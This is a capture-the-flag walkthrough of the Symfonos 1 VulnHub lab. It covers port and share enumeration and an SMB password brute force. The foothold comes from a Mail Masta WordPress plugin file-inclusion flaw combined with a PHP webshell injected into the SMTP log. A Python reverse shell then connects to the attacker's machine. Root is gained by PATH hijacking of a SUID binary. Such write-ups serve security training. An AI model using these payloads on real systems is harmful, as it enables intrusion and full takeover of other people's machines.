Recon

NMAP Complete Scan

# Nmap 7.92 scan initiated Fri Jan 14 00:34:21 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-1/192.168.56.123/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-1/192.168.56.123/scans/xml/_full_tcp_nmap.xml 192.168.56.123
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.123
Host is up, received arp-response (0.00051s latency).
Scanned at 2022-01-14 00:34:22 +08 for 29s
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEgzdI5IpQcFfjqrj7pPhaxTxIJaS0kXjIektEgJg0+jGfOGDi+uaG/pM0Jg5lrOh4BElQFIGDQmf10JrV5CPk/qcs8zPRtKxOspCVBgaQ6wdxjvXkJyDvxinDQzEsg6+uVY2t3YWgTeSPoUP+QC4WWTS/r1e2O2d66SIPzBYVKOP2+WmGMu9MS4tFY15cBTQVilprTBE5xjaO5ToZk+LkBA6mKey4dQyz2/u1ipJKdNBS7XmmjIpyqANoVPoiij5A2XQbCH/ruFfslpTUTl48XpfsiqTKWufcjVO08ScF46wraj1okRdvn+1ZcBV/I7n3BOrXvw8Jxdo9x2pPXkUF
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD8/lJjmeqerC3bEL6MffHKMdTiYddhU4dOlT6jylLyyl/tEBwDRNfEhOfc7IZxlkpg4vmRwkU25WdqsTu59+WQ=
|   256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOinjerzzjSIgDxhdUgmP/i6nOtGHQq2ayeO1j1h5d5a
25/tcp  open  smtp        syn-ack ttl 64 Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Issuer: commonName=symfonos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-29T00:29:42
| Not valid after:  2029-06-26T00:29:42
| MD5:   086e c75b c397 34d6 6293 70cd 6a76 c4f2
| SHA-1: e3dc 7293 d59b 3444 d39a 41ef 6fc7 2006 bde4 825f
| -----BEGIN CERTIFICATE-----
| MIICyzCCAbOgAwIBAgIJAJzTHaEY8CzbMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
| BAMMCHN5bWZvbm9zMB4XDTE5MDYyOTAwMjk0MloXDTI5MDYyNjAwMjk0MlowEzER
| MA8GA1UEAwwIc3ltZm9ub3MwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
| AQDMqUx7kERzGuX2GTokAv1cRHV81loI0yEE357TgkGOQEZUA9jpAkceEpjHGdu1
| PqfMxETG0TJYdajwYAxr01H5fJmLi04OhKHyKk+yKIRpOO0uU1tvIcpSx5A2QJky
| BY+q/82SZLhx/l2xyP2jrc63mz4FSrzav/oPpNT6rxLoPIvJ8z+vnUr3qp5Ea/DH
| WRePqBVoMqjqc9EGtwND1EMGJKlZb2KeDaqdJ02K3fZQmyR0+HyYoKq93+sKk34l
| 23Q7Tzuq07ZJXHheyN3G6V4uGUmJTGPKTMZlOVyeEo6idPjdW8abEq5ier1k8jWy
| IzwTU8GmPe4MR7csKR1omk8bAgMBAAGjIjAgMAkGA1UdEwQCMAAwEwYDVR0RBAww
| CoIIc3ltZm9ub3MwDQYJKoZIhvcNAQELBQADggEBAF3kiDg7BrB5xNV+ibk7GUVc
| 9J5IALe+gtSeCXCsk6TmEU6l2CF6JNQ1PDisZbC2d0jEEjg3roCeZmDRKFC+NdwM
| iKiqROMh3wPMxnHEKgQ2dwGU9UMb4AWdEWzNMtDKVbgf8JgFEuCje0RtGLKJiTVw
| e2DjqLRIYwMitfWJWyi6OjdvTWD3cXReTfrjYCRgYUaoMuGahUh8mmyuFjkKmHOR
| sMVCO/8UdLvQr7T8QO/682shibBd4B4eekc8aQa7xoEMevSlY8WjtJKbuPvUYsay
| slgPCkgga6SRw1X/loPYutfIvK7NQPqcEM8YrWTMokknp7EsJXDl85hRj6GghhE=
|_-----END CERTIFICATE-----
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:6A:94:16 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/14%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61E
OS:054AB%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=8
OS:)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B
OS:4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120
OS:)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=N)IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 198.047 days (since Tue Jun 29 23:26:34 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h59m58s, deviation: 3h27m51s, median: 7h59m58s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 46050/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 54676/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 11022/udp): CLEAN (Timeout)
|   Check 4 (port 25141/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   SYMFONOS<00>         Flags: <unique><active>
|   SYMFONOS<03>         Flags: <unique><active>
|   SYMFONOS<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2022-01-13T18:34:39-06:00
| smb2-time: 
|   date: 2022-01-14T00:34:39
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.56.123

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 14 00:34:51 2022 -- 1 IP address (1 host up) scanned in 29.89 seconds

TCP/80 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
└─# ffuf -u http://192.168.236.8/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,php' -fw 22

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.236.8/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 22
________________________________________________

                        [Status: 200, Size: 328, Words: 48, Lines: 25]
index.html              [Status: 200, Size: 328, Words: 48, Lines: 25]
index.html              [Status: 200, Size: 328, Words: 48, Lines: 25]
manual                  [Status: 301, Size: 315, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 7016 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

TCP/139,445 (SMB)

Enum4linux

 --------------------------------------
|    Users via RPC on 192.168.236.8    |
 --------------------------------------
[*] Enumerating users via 'querydispinfo'
[+] Found 1 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 1 users via 'enumdomusers'
[+] After merging user results we have 1 users total:
'1000':
  username: helios
  name: ''
  acb: '0x00000010'
  description: ''
  
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\helios (Local User)

helios

Crackmapexec+SMBMap

┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
└─# crackmapexec smb $ip -u '' -p '' --shares
SMB         192.168.236.8   445    SYMFONOS         Share           Permissions     
SMB         192.168.236.8   445    SYMFONOS         -----           -----------     
SMB         192.168.236.8   445    SYMFONOS         print$                          
SMB         192.168.236.8   445    SYMFONOS         helios			
SMB         192.168.236.8   445    SYMFONOS         anonymous       READ            
SMB         192.168.236.8   445    SYMFONOS         IPC$                            

┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
└─# smbmap -H $ip 
[+] Guest session   	IP: 192.168.236.8:445	Name: unknown                                        
Disk                                                Permissions		Comment
----                                                -----------		-------
print$                                              NO ACCESS		Printer Drivers
helios                                              NO ACCESS		Helios personal share
anonymous                                           READ ONLY	
IPC$                                                NO ACCESS		IPC Service

helios
anonymous, READ

Initial Foothold

TCP/139,445 (SMB) Fileshare Bruteforce

Download all files from anonymous fileshare

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot]
 └─# smbclient //$ip/anonymous -c 'prompt;recurse;mget *'
 Enter WORKGROUP\root's password: 
 getting file \attention.txt of size 154 as attention.txt (8.8 KiloBytes/sec) (average 8.8 KiloBytes/sec)

View attention.txt

Generate username & password wordlist

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# cat > usernames.txt <<EOF
 > helios
 > Helios
 > zeus
 > Zeus
 > EOF
 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# cat > passwords.txt <<EOF
 > epidioko
 > qwerty
 > baseball
 > EOF

Bruteforce SMB Fileshare

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# ./smb_bruteforce.sh $ip usernames.txt passwords.txt helios
 Try: helios + epidioko
 Try: helios + qwerty
 Found Valid Combination helios:qwerty
 Try: helios + baseball
 Try: Helios + epidioko
 Try: Helios + qwerty
 Found Valid Combination Helios:qwerty
 Try: Helios + baseball
 Try: zeus + epidioko
 Try: zeus + qwerty
 Try: zeus + baseball
 Try: Zeus + epidioko
 Try: Zeus + qwerty
 Try: Zeus + baseball

Download all files from helios fileshare

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
 └─# smbclient //$ip/helios -U helios -c 'prompt;recurse;mget *'
 Enter WORKGROUP\helios's password: qwerty
 getting file \research.txt of size 432 as research.txt (21.1 KiloBytes/sec) (average 21.1 KiloBytes/sec)
 getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 21.5 KiloBytes/sec)

View downloaded files
- /h3l105

TCP/80 (HTTP) - Wordpress Plugin Exploit

Proceed to /h3l105
- Wordpress CMS

Enumerate wp users

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
 └─# wpscan --no-update --disable-tls-checks --plugins-detection aggressive --plugins-version-detection aggressive --url http://symfonos.local/h3l105 -e ap -f cli-no-color 2>&1 | tee "/root/vulnHub/Symfonos-1/192.168.56.123/scans/tcp80/tcp80_http_wpscan_plugin_enum.txt"
 [i] User(s) Identified:

 [+] admin
  | Found By: Author Posts - Author Pattern (Passive Detection)
  | Confirmed By:
  |  Rss Generator (Passive Detection)
  |  Wp Json Api (Aggressive Detection)
  |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
  |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  |  Login Error Messages (Aggressive Detection)

Enumerate wp plugins

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123]
 └─# wpscan --no-update --disable-tls-checks --plugins-detection aggressive --plugins-version-detection aggressive --url http://symfonos.local/h3l105 -e ap -f cli-no-color 2>&1 | tee "/root/vulnHub/Symfonos-1/192.168.56.123/scans/tcp80/tcp80_http_wpscan_plugin_enum.txt"
 [i] Plugin(s) Identified:

 [+] akismet
  | Location: http://symfonos.local/h3l105/wp-content/plugins/akismet/
  | Last Updated: 2021-10-01T18:28:00.000Z
  | Readme: http://symfonos.local/h3l105/wp-content/plugins/akismet/readme.txt
  | [!] The version is out of date, the latest version is 4.2.1
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/akismet/, status: 200
  |
  | Version: 4.1.2 (100% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/akismet/readme.txt
  | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/akismet/readme.txt

 [+] mail-masta
  | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
  | Latest Version: 1.0 (up to date)
  | Last Updated: 2014-09-19T07:52:00.000Z
  | Readme: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
  | [!] Directory listing is enabled
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/, status: 200
  |
  | Version: 1.0 (100% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
  | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

 [+] site-editor
  | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
  | Latest Version: 1.1.1 (up to date)
  | Last Updated: 2017-05-02T23:34:00.000Z
  | Readme: http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt
  |
  | Found By: Known Locations (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/, status: 200
  |
  | Version: 1.1.1 (80% confidence)
  | Found By: Readme - Stable Tag (Aggressive Detection)
  |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt

site-editor 1.1.1
mail-masta 1.0

Search exploits for site-editor 1.1.1

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# searchsploit site editor wordpress
 ---------------------------------------------------------------------------------- 
 |Exploit Title   					    |  Path
 ----------------------------------------------------------------------------------
 WordPress Plugin Site Editor 1.1.1 - Local File Inclusion   | php/webapps/44340.txt
 ----------------------------------------------------------------------------------

Seach exploits for mail-masta 1.0

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# searchsploit wordpress mail masta
 ----------------------------------------------------------------------------------- 
 | Exploit Title 		                           | Path           
 ----------------------------------------------------------------------------------- 
 WordPress Plugin Mail Masta 1.0 - Local File Inclusion     | php/webapps/40290.txt
 WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) | php/webapps/50226.py
 WordPress Plugin Mail Masta 1.0 - SQL Injection            | php/webapps/41438.txt
 ----------------------------------------------------------------------------------- 

Use WordPress Plugin Mail Masta 1.0 - Local File Inclusion

Exploitable parameter

 http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=<LFI File>

Include /etc/passwd

Since SMTP TCP/25 is up, poison SMTP log

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# telnet $ip 25
 Trying 192.168.236.8...
 Connected to 192.168.236.8.
 Escape character is '^]'.
 220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
 MAIL FROM:asdf
 RCPT TO: helios
 DATA
 <?php system($_GET['c']); ?>
 .
 QUIT250 2.1.0 Ok
 250 2.1.5 Ok
 354 End data with <CR><LF>.<CR><LF>
 250 2.0.0 Ok: queued as 0CBB24081F

 221 2.0.0 Bye
 Connection closed by foreign host.

Include SMTP log file & test RCE

 http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=id;

Check if python exists

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# curl -s "http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=which+python" | grep python
 /usr/bin/python

Execute Reverse Shell

 # Curl does not work 
 http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=python+-c+'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("192.168.236.4",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

Obtained www-data shell

 ┌──(root💀kali)-[~/vulnHub/Symfonos-1/192.168.56.123/loot/smb]
 └─# nc -nvlp 4444
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4444
 Ncat: Listening on 0.0.0.0:4444
 Ncat: Connection from 192.168.236.8.
 Ncat: Connection from 192.168.236.8:37968.
 $ whoami;id
 whoami;id
 helios
 uid=1000(helios) gid=1000(helios) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

Privilege Escalation

Root - Via SUID Binary (Path Hijacking)

Search for SUID binaries

 helios@symfonos:/var/www/html/h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -4000 2>/dev/null 
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/lib/openssh/ssh-keysign
 /usr/bin/passwd
 /usr/bin/gpasswd
 /usr/bin/newgrp
 /usr/bin/chsh
 /usr/bin/chfn
 /opt/statuscheck <- Suspicious
 /bin/mount
 /bin/umount
 /bin/su
 /bin/ping

Execute /opt/statuscheck

 helios@symfonos:/var/www/html/h3l105/wp-content/plugins/mail-masta/inc/campaign$ /opt/statuscheck
 HTTP/1.1 200 OK
 Date: Mon, 24 Jan 2022 03:51:47 GMT
 Server: Apache/2.4.25 (Debian)
 Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
 ETag: "148-58c6b9bb3bc5b"
 Accept-Ranges: bytes
 Content-Length: 328
 Vary: Accept-Encoding
 Content-Type: text/html

curl localhost?

View contents of /opt/statuscheck w/ strings
- Full Path of curl is not specified, susceptible to path hijacking

Exploit

Prepend /tmp to PATH environment
1 export PATH=/tmp:$PATH

Create curl, to spawn root shell

 helios@symfonos:/tmp$ printf 'cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash\n' > /tmp/curl; chmod 4777 /tmp/curl;
		
 helios@symfonos:/tmp$ cat /tmp/curl 
 cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash

Execute /opt/statuscheck

Obtain root shell

 helios@symfonos:/tmp$ /opt/statuscheck 
 helios@symfonos:/tmp$ ls -la
 total 1088
 drwxrwxrwt  2 root   root      4096 Jan 23 22:00 .
 drwxr-xr-x 22 root   root      4096 Jun 28  2019 ..
 -rwsrwxrwx  1 helios helios      54 Jan 23 21:58 curl
 -rwsr-xr-x  1 root   helios 1099016 Jan 23 22:00 rootbash
 helios@symfonos:/tmp$ /tmp/rootbash -p
 rootbash-4.4# whoami
 root
 rootbash-4.4# 

Obtain Root Flag

 rootbash-4.4# cat proof.txt 

     Congrats on rooting symfonos:1!

                  \ __
 --==/////////////[})))==*
                  / \ '          ,|
                     `\`\      //|                             ,|
                       \ `\  //,/'                           -~ |
    )             _-~~~\  |/ / |'|                       _-~  / ,
   ((            /' )   | \ / /'/                    _-~   _/_-~|
  (((            ;  /`  ' )/ /''                 _ -~     _-~ ,/'
  ) ))           `~~\   `\\/'/|'           __--~~__--\ _-~  _/, 
 ((( ))            / ~~    \ /~      __--~~  --~~  __/~  _-~ /
  ((\~\           |    )   | '      /        __--~~  \-~~ _-~
     `\(\    __--(   _/    |'\     /     --~~   __--~' _-~ ~|
      (  ((~~   __-~        \~\   /     ___---~~  ~~\~~__--~ 
       ~~\~~~~~~   `\-~      \~\ /           __--~~~'~~/
                    ;\ __.-~  ~-/      ~~~~~__\__---~~ _..--._
                    ;;;;;;;;'  /      ---~~~/_.-----.-~  _.._ ~\     
                   ;;;;;;;'   /      ----~~/         `\,~    `\ \        
                   ;;;;'     (      ---~~/         `:::|       `\\.      
                   |'  _      `----~~~~'      /      `:|        ()))),      
             ______/\/~    |                 /        /         (((((())  
           /~;;.____/;;'  /          ___.---(   `;;;/             )))'`))
          / //  _;______;'------~~~~~    |;;/\    /                ((   ( 
         //  \ \                        /  |  \;;,\                 `   
        (<_    \ \                    /',/-----'  _> 
         \_|     \\_                 //~;~~~~~~~~~ 
                  \_|               (,~~   
                                     \~\
                                      ~~

     Contact me via Twitter @zayotic to give feedback!


 rootbash-4.4# 

Vulnhub - Symfonos 1